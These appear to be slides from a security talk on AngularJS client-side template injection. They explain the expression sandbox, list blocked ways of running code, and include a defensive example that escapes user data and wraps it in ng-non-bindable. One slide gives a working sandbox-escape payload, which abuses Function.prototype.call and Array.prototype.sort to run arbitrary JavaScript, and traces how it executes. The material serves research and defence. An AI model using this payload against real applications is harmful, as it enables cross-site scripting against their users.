2. What is AngularJS? And where's the sandbox?
• JavaScript framework for building single page web applications.
• Mustache style templates: having <h1>{{1+2+3}}</h1> anywhere in an Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with JavaScript
• Template expression JavaScript is sandboxed - it can't reach [object Window] or the DOM
• If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular bound HTML
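The defensive side of that last bullet, as an added example that is not from the slides: ordinary HTML escaping keeps `<script>` out of the page but leaves `{{…}}` in the text node for Angular's interpolator to evaluate, so user data printed into Angular-compiled HTML must also be kept out of interpolation, e.g. by wrapping it in an element carrying ng-non-bindable. The helper names below are assumptions; the sample inputs are constructed.

```javascript
// Added example (not from the slides): server-side rendering of user data
// into an AngularJS-compiled template, plus a check for interpolation markers.

// Default interpolation delimiters of $interpolateProvider (assumed unchanged).
const START_SYMBOL = '{{';
const END_SYMBOL = '}}';

// Standard HTML escaping for text content. It stops tag/attribute injection
// but does NOT remove {{ }}; Angular evaluates the braces in the text node.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// True when the string holds a complete {{ ... }} pair, i.e. text that
// Angular would try to evaluate. Useful for logging/alerting on user input.
function containsInterpolation(s) {
  const text = String(s);
  const start = text.indexOf(START_SYMBOL);
  return start !== -1 && text.indexOf(END_SYMBOL, start + START_SYMBOL.length) !== -1;
}

// Escapes the data and wraps it in ng-non-bindable so $compile skips the
// subtree: the braces stay literal text instead of becoming an expression.
// Only valid for text content; attribute contexts need separate handling.
function renderUserText(s) {
  return '<span ng-non-bindable>' + escapeHtml(s) + '</span>';
}

// Constructed inputs: a harmless string, the slide-2 probe, and a tag injection.
const SAMPLES = ['hello world', '<h1>{{1+2+3}}</h1>', '<b>x</b>'];

// Returns, per sample, whether escaping alone would still leave interpolation.
function escapingLeavesInterpolation(samples) {
  return samples.map((s) => containsInterpolation(escapeHtml(s)));
}
```

Run with any Node.js version; `escapingLeavesInterpolation(SAMPLES)` shows that the `{{1+2+3}}` probe survives HTML escaping, which is why the ng-non-bindable wrapper is needed.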
3. Executing JS… From JS
• eval() - Unavailable under window
• document.write - Unavailable under document
• location="javascript:" - Unavailable under document
• Function("code")() - Unavailable under blacklist
• What else is there?
5. The how
• The payload, inside Angular's mustache delimiters:
{{
toString.constructor.prototype.toString = toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor)
}}
• What Array.prototype.sort does with the value a compareFunction returns:
if(compareFunction(element1, element2) == 1){
  //sort element as bigger
}else if(… == 0){
  //sort element as same
}else{
  //sort element as smaller
}
• With toString.constructor (i.e. Function) passed as compareFunction, and Function.prototype.toString already replaced by Function.prototype.call, the comparison unfolds as:
if(toString.constructor("a", "alert(1)") == 1){
if(Function("a", "alert(1)") == 1){
if((function(a){alert(1)}) == 1){
if((function(a){alert(1)}).toString() == 1..toString()){
if((function(a){alert(1)}).call() == 1..toString()){
alert(1)